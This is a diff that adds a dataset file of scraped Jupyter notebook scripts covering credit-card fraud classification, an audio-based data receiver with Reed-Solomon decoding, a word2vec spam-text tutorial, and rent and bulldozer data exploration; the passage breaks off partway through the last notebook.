diff --git "a/4414.jsonl" "b/4414.jsonl" new file mode 100644--- /dev/null +++ "b/4414.jsonl" @@ -0,0 +1,663 @@ +{"seq_id":"30355795352","text":"# Import Functions \n\n# +\n# #!conda install -y -c conda-forge xgboost\n\n# +\n#pip install geopy\n\n#DF/EDA imports\nimport geopy.distance\nimport pandas as pd\nimport numpy as np\n\n#plotting imports\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nplt.style.use('fivethirtyeight')\n# %matplotlib inline\nimport matplotlib.cm as cm\n\n#modeling imports\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.metrics import precision_recall_curve,f1_score, fbeta_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import StandardScaler\nimport xgboost as xgb\n# -\n\n# Importing/Cleaning Data and EDA \n\ndf = pd.read_csv('cc_fraud.csv')\n\ndf.head()\n\ndf['name'] = df['first'] + \" \" + df['last']\n\ndf = df.drop(columns = [\"Unnamed: 0\", \"first\" , \"last\" , \"trans_num\"])\n\nlen(df['name'].unique())\n\n(df.is_fraud == 1).sum()\n\npercent_fraud = 2145 / 555719\nprint(percent_fraud)\nprint(1 - percent_fraud)\n\n# Adding Features: \"Purchase Distance\" ,\"Time Since Last Purchase\", and \"Cumulative Fraud\" \n\nlat_list = list(df[\"lat\"])\nlong_list = list(df[\"long\"])\nmerch_lat_list = list(df[\"merch_lat\"])\nmerch_long_list = list(df[\"merch_long\"])\n\n\ndef distance_from_merch(lat1 , lat2 , long1 , long2):\n coords_1 = (lat1, long1)\n coords_2 = (lat2, long2)\n return geopy.distance.distance(coords_1, coords_2).miles\n\n\ndistance_list = []\nfor idx, x in enumerate(lat_list):\n distance_list.append(distance_from_merch(lat_list[idx], merch_lat_list[idx], long_list[idx], merch_long_list[idx]))\n \n\ndf[\"Purchase_Distance\"] = distance_list\n\ndf = df.drop(columns = [\"lat\", \"long\" , \"merch_lat\" , \"merch_long\", 'cc_num' , 'street' , 'city' , 'state'])\n\ndf['time_since_prev_purchase'] = df.groupby('name')['unix_time'].diff()\n\ndf['cumulative_fraud'] = df.groupby('name')['is_fraud'].cumsum()\n\ndf = df.drop(columns = [\"trans_date_trans_time\", \"unix_time\" , 'job'])\n\n# Exploring Updated Data Frame \n\nfraud_df = df[df.is_fraud != 0]\n#fraud_df\n\nana_df = df[df.name == \"Ana Howell\"]\n#ana_df[ana_df.is_fraud == 1]\n\nscamees = (df.loc[df['name'].isin(fraud_df.name.unique())])\nscamees.describe()\n\nlen(scamees['name'].unique())\n\ndf.describe()\n\nfraud_df.describe()\n\n# Things to note: no real difference with purchase-distance, amount is on average much higher for fraud, \n# time since previous purchase tends to be much lower for fraud as well. 
\n# Will explore these two features with cumulative fraud\n\n# Exploring a Pair Plot \n\nsns.pairplot(df, hue='is_fraud')\n\ndf = df.dropna()\ndf.head()\n\n\n\ndf = pd.get_dummies(df, columns = [\"category\" , \"gender\"] , drop_first = True)\n\n# KNN Modeling \n\ndf.columns\n\n'''\nknn_X = df[['amt', 'zip',\n 'time_since_prev_purchase', 'cumulative_fraud',\n 'category_food_dining', 'category_gas_transport',\n 'category_grocery_net', 'category_grocery_pos',\n 'category_health_fitness', 'category_home', 'category_kids_pets',\n 'category_misc_net', 'category_misc_pos', 'category_personal_care',\n 'category_shopping_net', 'category_shopping_pos', 'category_travel']]\n'''\nknn_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\nknn_y = df['is_fraud']\n\nknn_X_train, knn_X_test, knn_y_train, knn_y_test = train_test_split(knn_X, knn_y, test_size=0.2, random_state=42)\n\nknn = KNeighborsClassifier(n_neighbors=50)\nknn.fit(knn_X_train, knn_y_train)\nknn_y_pred = knn.predict(knn_X_test)\nprint(metrics.accuracy_score(knn_y_test, knn_y_pred))\n\n# +\nknn = KNeighborsClassifier(n_neighbors=100)\nacc_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='accuracy')\nprec_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='precision')\nrec_scores = cross_val_score(knn, knn_X_train, knn_y_train, cv=10, scoring='recall')\n\nprint(\"Accuracy: \" , acc_scores, \"\\n\", \"Precision: \", prec_scores, \"\\n\", \"Recall: \", rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(knn_y_train, knn.predict_proba(knn_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves KNN');\n\n\n# -\n\ndef knn_confusion_matrix(model, threshold=0.5):\n knn_y_predict = (model.predict_proba(knn_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(knn_y_train, knn_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n plt.title('KNN Matrix');\n\n\n# +\nfrom ipywidgets import interactive, FloatSlider\n\ninteractive(lambda threshold: knn_confusion_matrix(knn, threshold), threshold=(0,1.0000,0.0001))\n# -\n\n\n\n\n\n\n\n# Logistic Modeling \n\nlog_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\nlog_y = df['is_fraud']\n\nlog_X_train, log_X_test, log_y_train, log_y_test = train_test_split(log_X, log_y, random_state=42)\nlm = LogisticRegression(C = 10, max_iter=1000)\nlm.fit(log_X_train, log_y_train)\n\nlog_acc_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='accuracy')\nlog_prec_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='precision')\nlog_rec_scores = cross_val_score(lm, log_X_train, log_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , log_acc_scores, \"\\n\", \"Precision: \", log_prec_scores, \"\\n\", \"Recall: \", log_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(log_y_train, lm.predict_proba(log_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower 
left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Logistic Regression');\n\n\n# +\ndef log_confusion_matrix(model, threshold=0.5):\n log_y_predict = (model.predict_proba(log_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(log_y_train, log_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n plt.title('Log Matrix');\n \ninteractive(lambda threshold: log_confusion_matrix(lm, threshold), threshold=(0,1.0000,0.0001))\n# -\n\nweighted_lm = LogisticRegression(class_weight={1 : 300, 0 : 1}, solver='liblinear')\nweighted_lm.fit(log_X_train, log_y_train)\n\n\nw_log_acc_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='accuracy')\nw_log_prec_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='precision')\nw_log_rec_scores = cross_val_score(weighted_lm, log_X_train, log_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , w_log_acc_scores, \"\\n\", \"Precision: \", w_log_prec_scores, \"\\n\", \"Recall: \", w_log_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(log_y_train, weighted_lm.predict_proba(log_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Log Weighted');\n# -\n\ninteractive(lambda threshold: log_confusion_matrix(weighted_lm, threshold), threshold=(0,1.0000,0.0001))\n\n\n\n# Decision Tree and Random Forest \n\ndt_X = df[['amt', 'time_since_prev_purchase', 'cumulative_fraud']]\ndt_y = df['is_fraud']\n\ndt_X_train, dt_X_test, dt_y_train, dt_y_test = train_test_split(dt_X, dt_y, random_state=42)\ndt = DecisionTreeClassifier(max_depth=10)\ndt.fit(dt_X_train, dt_y_train)\n\ndt_acc_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\ndt_prec_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='precision')\ndt_rec_scores = cross_val_score(dt, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , dt_acc_scores, \"\\n\", \"Precision: \", dt_prec_scores, \"\\n\", \"Recall: \", dt_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, dt.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Decision Tree');\n\n\n# -\n\ndef dt_confusion_matrix(model, threshold=0.5):\n dt_y_predict = (model.predict_proba(dt_X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(dt_y_train, dt_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: dt_confusion_matrix(dt, threshold), threshold=(0,1.0000,0.0001))\n\nrf = RandomForestClassifier(n_estimators=100)\nrf.fit(dt_X_train, dt_y_train)\n\nrf_acc_scores = 
cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, rf.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves Random Forest');\n# -\n\ninteractive(lambda threshold: dt_confusion_matrix(rf, threshold), threshold=(0,1.0000,0.0001))\n\nrf_acc_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf, dt_X_test, dt_y_test, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n\n# +\ndef test_confusion_matrix(model, threshold=0.5):\n dt_y_predict = (model.predict_proba(dt_X_test)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(dt_y_test, dt_y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n \ninteractive(lambda threshold: test_confusion_matrix(weighted_rf, threshold), threshold=(0,1.0000,0.0001))\n# -\n\nweighted_rf = RandomForestClassifier(n_estimators=100, class_weight={1 : 300, 0 : 1})\nweighted_rf.fit(dt_X_train, dt_y_train)\n\nrf_acc_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(weighted_rf, dt_X_train, dt_y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(dt_y_train, weighted_rf.predict_proba(dt_X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves');\n# -\n\ninteractive(lambda threshold: dt_confusion_matrix(weighted_rf, threshold), threshold=(0,1.0000,0.0001))\n\n\n# Trying Gradient Boosting and Evaluating Metrics \n\ndef rmse(actuals, preds):\n return np.sqrt(((actuals - preds) ** 2).mean())\n\n\nrmse(rf.predict(dt_X_test), dt_y_test)\n\n# +\ngbm = xgb.XGBRegressor( \n n_estimators=10000, \n max_depth=10,\n objective=\"reg:squarederror\", \n learning_rate=.01, \n subsample=1,\n min_child_weight=1,\n colsample_bytree=.8\n )\n\neval_set=[(dt_X_train, dt_y_train),(dt_X_test,dt_y_test)]\nfit_model = gbm.fit( \n dt_X_train, dt_y_train, \n eval_set=eval_set,\n eval_metric='rmse',\n early_stopping_rounds=30,\n verbose = True \n )\nrmse(gbm.predict(dt_X_test, ntree_limit=gbm.best_ntree_limit),dt_y_test)\n\n# -\n\nmodel = 
gbm.best_ntree_limit\nmodel\n\n\n\nxgb.plot_importance(gbm)\nxgb.plot_importance(gbm, importance_type='gain')\n\ngbm.get_booster().get_score(importance_type='weight')\n\ngbm.get_booster().get_score(importance_type='gain')\n\ngbm.get_booster().get_score(importance_type='cover')\n\n\n\n\n\nX = df[['amt',\n 'time_since_prev_purchase', 'cumulative_fraud',\n 'category_food_dining', 'category_gas_transport',\n 'category_grocery_net', 'category_grocery_pos',\n 'category_health_fitness', 'category_home', 'category_kids_pets',\n 'category_misc_net', 'category_misc_pos', 'category_personal_care',\n 'category_shopping_net', 'category_shopping_pos', 'category_travel']]\n\nX_train, X_test, y_train, y_test = train_test_split(X, dt_y, random_state=42)\nrf_1 = RandomForestClassifier(n_estimators=100)\nrf_1.fit(X_train, y_train)\n\nrf_acc_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='accuracy')\nrf_prec_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='precision')\nrf_rec_scores = cross_val_score(rf_1, X_train, y_train, cv=10, scoring='recall')\nprint(\"Accuracy: \" , rf_acc_scores, \"\\n\", \"Precision: \", rf_prec_scores, \"\\n\", \"Recall: \", rf_rec_scores)\n\n# +\nprecision_curve, recall_curve, threshold_curve = precision_recall_curve(y_train, rf_1.predict_proba(X_train)[:,1])\n\nplt.figure(dpi=80)\nplt.plot(threshold_curve, precision_curve[1:],label='precision')\nplt.plot(threshold_curve, recall_curve[1:], label='recall')\nplt.legend(loc='lower left')\nplt.xlabel('Threshold (above this probability, label as fraud)');\nplt.title('Precision and Recall Curves');\n\n\n# -\n\ndef rf_1_confusion_matrix(model, threshold=0.5):\n y_predict = (model.predict_proba(X_train)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(y_train, y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: rf_1_confusion_matrix(rf_1, threshold), threshold=(0,1.0000,0.0001))\n\n\ndef rf_test_confusion_matrix(model, threshold=0.5):\n y_predict = (model.predict_proba(X_test)[:, 1] >= threshold)\n fraud_confusion = confusion_matrix(y_test, y_predict)\n plt.figure(dpi=80)\n sns.heatmap(fraud_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',\n xticklabels=['legit', 'fraud'],\n yticklabels=['legit', 'fraud']);\n plt.xlabel('prediction')\n plt.ylabel('actual')\n\n\ninteractive(lambda threshold: rf_test_confusion_matrix(rf_1, threshold), threshold=(0,1.0000,0.0001))\n\n493 / (493 + 35)\n\n# +\ngbm = xgb.XGBRegressor( \n n_estimators=10000, \n max_depth=10,\n objective=\"reg:squarederror\", \n learning_rate=.01, \n subsample=1,\n min_child_weight=1,\n colsample_bytree=.8\n )\n\neval_set=[(X_train, y_train),(X_test, y_test)]\nfit_model = gbm.fit( \n X_train, y_train, \n eval_set=eval_set,\n eval_metric='rmse',\n early_stopping_rounds=30,\n verbose = True \n )\n# -\n\nxgb.plot_importance(gbm)\nxgb.plot_importance(gbm, importance_type='gain')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Mitchell-Seiter/Project_4_Classification_Fraud_Detection","sub_path":"Updated_Project_4.ipynb","file_name":"Updated_Project_4.ipynb","file_ext":"py","file_size_in_byte":17098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"595251961","text":"import sounddevice as sd\nfrom pam import SoundCommunication\nfrom testing import 
Tester\nimport unireedsolomon.rs as rs\n\n# sampling rate\nFS = 44100\n\n\ndef str2bits(str):\n res = bin(int.from_bytes(str.encode('ascii'), 'big'))[2:]\n return '0'*(8 - (len(res) % 8)) + res\n\n\ndef bits2str(bits):\n r = b''\n for i in range(0, len(bits), 8):\n r += int(bits[i:i+8], 2).to_bytes(1, 'big')\n return r.decode('latin_1')\n\n\ndef save2file(file_name, text):\n with open(file_name, \"w\", encoding = \"utf8\" ) as f:\n print(text, file=f)\n\n\ndef bits2Str(bits):\n res = []\n for i in np.arange(0,len(bits),8):\n res.append(int(bits[i:i+8],2))\n return bytes(res).decode()\n\n\ndef decode_rs(msg):\n rs_coder = rs.RSCoder(255,185)\n return rs_coder.decode(msg)[0]\n\n\n# +\nW = sd.rec(int(10 * FS), channels=1, samplerate=FS, blocking=True).ravel()\n# msgSymLen has to be increased to a max\ncomm = SoundCommunication(FS, 200, 1000, 2000, msgSymLen = 2328)\nwr = comm.decode(W)\n\nmsg = bits2Str(wr)\nreceived_text = decode_rs(msg)\n\n\nmerge_lines = lambda text, l: l if not text else text + l\n\nwith open(\"text.txt\") as f:\n lines = f.readlines()\n text = reduce(merge_lines, lines, '')\n\nrt = received_text.split()\nt = text.split()\nN = min(len(rt),len(t))\n\nerror = 0\n\nfor i in range(N):\n if (rt[i] != t[i]):\n error += 1\n\nprint(\"Total number of differences is :\", error)\n\nsave2file('received.txt', received_text)\n# -\n\n\n","repo_name":"korel-one/over_the_air","sub_path":"receiver.ipynb","file_name":"receiver.ipynb","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"36104193458","text":"# + [markdown] id=\"IWKLJTPWjv-w\"\n# # word2vec: How To Prep Word Vectors For Modeling\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"3s27a8tolCF3\" outputId=\"3d74fd25-f67e-4215-9bf2-6610de74d9e0\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + [markdown] id=\"4CULosXzjv-6\"\n# ### Train Our Own Model\n\n# + id=\"Mh7m1bjxjv-9\"\n# Read in the data, clean it, split it into train and test sets, and then train a word2vec model\nimport gensim\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\npd.set_option('display.max_colwidth', 100)\n\nmessages = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/LinkedIn Learning/03_Advanced NLP with Python for Machine Learning/Ex_Files_Adv_NLP_Python_ML/Exercise Files/data/spam.csv', encoding='latin-1')\nmessages = messages.drop(labels = [\"Unnamed: 2\", \"Unnamed: 3\", \"Unnamed: 4\"], axis = 1)\nmessages.columns = [\"label\", \"text\"]\n\n\nmessages['text_clean'] = messages['text'].apply(lambda x: gensim.utils.simple_preprocess(x))\nX_train, X_test, y_train, y_test = train_test_split(messages['text_clean'],\n messages['label'], test_size=0.2)\n\nw2v_model = gensim.models.Word2Vec(X_train,\n vector_size=100,\n window=5,\n min_count=2)\n\n# + [markdown] id=\"fpPmP-Wvjv_C\"\n# ### Prep Word Vectors\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"VfSIRgB4jv_E\" outputId=\"6aee2944-16ea-46b2-f17c-325f5187030e\"\n# Generate a list of words the word2vec model learned word vectors for\nw2v_model.wv.index_to_key\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"I5aNisWujv_I\" outputId=\"9e729516-01c1-43b8-f7cf-c58f55dd8676\"\n# Generate aggregated sentence vectors based on the word vectors for each word in the sentence\nw2v_vect = np.array([np.array([w2v_model.wv[i] for i in ls if i in w2v_model.wv.index_to_key ])\n for ls in X_test])\n\n# 
here 1st for ls in X_test is executed\n\n# then for i in ls if i in w2v_model.wv.index2word is executed\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"k3NxKivFjv_J\" outputId=\"13de5745-35b3-49fc-b763-79d3d7924210\"\n# Why is the length of the sentence different than the length of the sentence vector?\nfor i, v in enumerate(w2v_vect):\n print(len(X_test.iloc[i]), len(v))\n\n# + id=\"L15qW2D_jv_K\"\n# Compute sentence vectors by averaging the word vectors for the words contained in the sentence\nw2v_vect_avg = []\n\nfor vect in w2v_vect:\n if len(vect)!=0:\n w2v_vect_avg.append(vect.mean(axis=0))\n else:\n w2v_vect_avg.append(np.zeros(100))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"hVj0M5D8jv_L\" outputId=\"5a425587-b5b0-44d3-cc41-55a2e0594a4a\"\n# Are our sentence vector lengths consistent?\nfor i, v in enumerate(w2v_vect_avg):\n print(len(X_test.iloc[i]), len(v))\n\n# + id=\"dqtNMj7Fjv_M\"\n\n","repo_name":"Ajimct007/learning","sub_path":"LinkedIn_Learning/03_Advanced NLP with Python for Machine Learning/02_Word2vec/02_Prepare_word2vec_for_model.ipynb","file_name":"02_Prepare_word2vec_for_model.ipynb","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"15686824458","text":"# +\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# %config InlineBackend.figure_format = \"retina\"\n# -\n\ndf_rent = pd.read_json('data/train.json')\n\ndf = df_rent[(df_rent['price'] <= 10_000) & (df_rent['price'] > 100)].copy()\n\ndf[\"bathrooms\"].value_counts()\n\ndf[df['bathrooms'] == 10]\n\ndf.loc[df['bathrooms'] == 10, 'bathrooms'] = 1\n\n# +\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.scatter(df['longitude'], df['latitude'], s = 1.5)\n\nplt.show()\n# -\n\ndf_rent[[\"longitude\", \"latitude\"]].describe()\n\nsum(df_rent['latitude'] == 0), sum(df_rent['longitude'] == 0), len(df_rent)\n\ndf_rent[df_rent['latitude'] == 0]['street_address']\n\n# Use latitude and longitude box of 40.55, -74.1 and 40.94, -73.67 on the upper right\n\ndf = df[(df['latitude']>40.55)&(df['latitude']<40.94) & \n (df['longitude'] >= -74.1) & (df['longitude']<=-73.67)].copy()\n\nlen(df), len(df_rent)\n\n# +\nfig, ax = plt.subplots(figsize = (7, 6))\n\nm = ax.scatter(df['longitude'], df['latitude'], s = 1.5, \n alpha = 0.5, \n cmap = \"rainbow\",\n c = df['price'], \n vmax = 4000, \n vmin = 1000, \n marker = '.')\n\nplt.colorbar(m)\nplt.show()\n# -\n\n# ## Exercise 2\n\n# +\nfig, ax = plt.subplots(figsize = (7, 6))\nm = ax.scatter(df['longitude'], df['latitude'], s = 1.5, \n alpha = 0.5, \n cmap = \"twilight\",\n c = df['price'], \n vmax = 4000, \n vmin = 2000, \n marker = '.')\n\nplt.colorbar(m)\nplt.show()\n# -\n\ndf.info()\n\ndf['created'] = pd.to_datetime(df['created'])\n\ndf['created'].dt.dayofweek\n\ndf['day'] = df['created'].dt.dayofweek\n\n# +\ndays = ['Mon','Tue','Wed',\"Thu\",'Fri','Sat','Sun']\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.hist(df['day'], bins = range(7 + 1), align = 'left')\nax.set_xticks(range(7))\nax.set_xticklabels(days)\n\nplt.show()\n# -\n\ndaycounts = df.groupby('day').count()['price']\n\n# +\ndays = ['Mon','Tue','Wed',\"Thu\",'Fri','Sat','Sun']\nfig, ax = plt.subplots(figsize = (3, 3))\n\nax.bar(range(7), daycounts)\nax.set_xticks(range(7))\nax.set_xticklabels(days)\n\nplt.show()\n# -\n\n# use pd.cut for continuous data instead of discrete data like this for days of the week\n\ndf_counts = 
df.groupby(['day', 'interest_level']).count()['price']\ndf_counts\n\ndf[(df['day'] == 0) & (df['interest_level'] == 'low')].count()[0]\n\nlow = df_counts.loc[:,'low'].values\nmed = df_counts.loc[:,'medium'].values\nhigh = df_counts.loc[:,'high'].values\n\nlow, med, high\n\n# +\nfig, ax = plt.subplots()\n\nw = .25\nax.bar(np.arange(7)-w, low, width = w, label = \"low\")\nax.bar(np.arange(7), med, width = w, label = \"med\")\nax.bar(np.arange(7)+w, high, width = w, label = \"high\")\nax.set_xticklabels([None, \"Mon\", \"Tue\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"])\n\nplt.legend()\nplt.show()\n# -\n\n# ## Exercise 3\n\ndf_counts.loc[:,['low', 'medium']].values\n\n# +\nfig, ax = plt.subplots()\n\n\nax.hist(df.groupby('manager_id').count()['price'], bins = 100)\n\n\nplt.show()\n# -\n\navg_mgr_prices = df.groupby('manager_id').mean()['price']\navg_mgr_prices\n\n# +\nfig, ax = plt.subplots()\n\n\nax.hist(avg_mgr_prices, bins = 100)\n\n\nplt.show()\n# -\n\ndf['features'] = df['features'].astype(str)\n\ndf['features'] = df['features'].str.lower()\ndf['features']\n\ndf['doorman'] = df['features'].str.contains('doorman')\ndf['laundry'] = df['features'].str.contains('laundry')\ndf['parking'] = df['features'].str.contains('parking')\ndf['hardwood'] = df['features'].str.contains('hardwood')\n\ndf.loc[~df['doorman'], 'price'].mean(), df.loc[df['doorman'], 'price'].mean()\n\ndf.groupby(\"doorman\").mean()['price']\n\ndf.groupby(\"laundry\").mean()['price']\n\ndf.groupby(\"parking\").mean()['price']\n\ndf.groupby(\"hardwood\").mean()['price']\n\nhoods = {\n \"hells\" : [40.7622, -73.9924],\n \"astoria\" : [40.7796684, -73.9215888],\n \"Evillage\" : [40.723163774, -73.984829394],\n \"LowerEast\" : [40.715033, -73.9842724],\n \"UpperEast\" : [40.768163594, -73.959329496],\n \"financial\" : [40.703830518, -74.005666644],\n}\n\nnp.abs(df.latitude - hoods[\"hells\"][0]) + np.abs(df.longitude - hoods['hells'][1])\n\nfor hood, l in hoods.items(): \n df[hood] = np.abs(df.latitude - l[0]) + np.abs(df.longitude - l[1])\n\ndf.T\n\ncorrs = []\nfor hood, l in hoods.items(): \n corr = np.corrcoef(df[hood], df['price'])\n corr = corr[0, 1]\n corrs.append(corr)\n print(f\"Hood {hood} correlation with price: {corr:.3f}\")\ndf_corr = pd.DataFrame(data = corrs, columns = ['correlation'], index = hoods.keys())\n\ndf_corr.sort_values(\"correlation\")\n\n# +\nfig, axes = plt.subplots(nrows = 3, ncols = 2, figsize = (8, 6), sharey=True, sharex=True)\n\naxes = axes.flatten()\nfor i, hodd in enumerate(df_corr.index): \n axes[i].scatter(df[hood], df['price'], s = 3, alpha = 0.05, c = '#4574B4')\n axes[i].set_xlabel(f\"Distance to {hood}\")\n axes[i].set_ylabel(\"Price\")\n \nplt.tight_layout()\n\nplt.show()\n# -\n\n# # Bulldozer\n\ndf_bull = pd.read_csv('data/Train.csv', parse_dates = ['saledate'])\n\ndf_bull.info()\n\ndf_bull = df_bull.sort_values('saledate')\n\ndf_bull = df_bull.set_index('SalesID')\ndf_bull\n\ndf_bull.isnull().sum() / len(df_bull) * 100\n\ndf_bull.iloc[0][['Ripper', 'Backhoe_Mounting', 'Travel_Controls']]\n\ndf_bull['Tire_Size'].unique()\n\ndf = df_bull.copy()\n\ndf['ProductGroup'].unique()\n\ndf['Drive_System'].unique()\n\ndf['Backhoe_Mounting'].unique()\n\n\ndef df_normalize_strings(df, col):\n \"\"\"standard take create one nan value (so its consistent)\"\"\"\n df[col] = df[col].str.lower()\n df[col] = df[col].fillna(np.nan) # make None -> np.nan\n df[col] = df[col].replace('none or unspecified', np.nan)\n df[col] = df[col].replace('none', np.nan)\n df[col] = df[col].replace('no', np.nan)\n df[col] = 
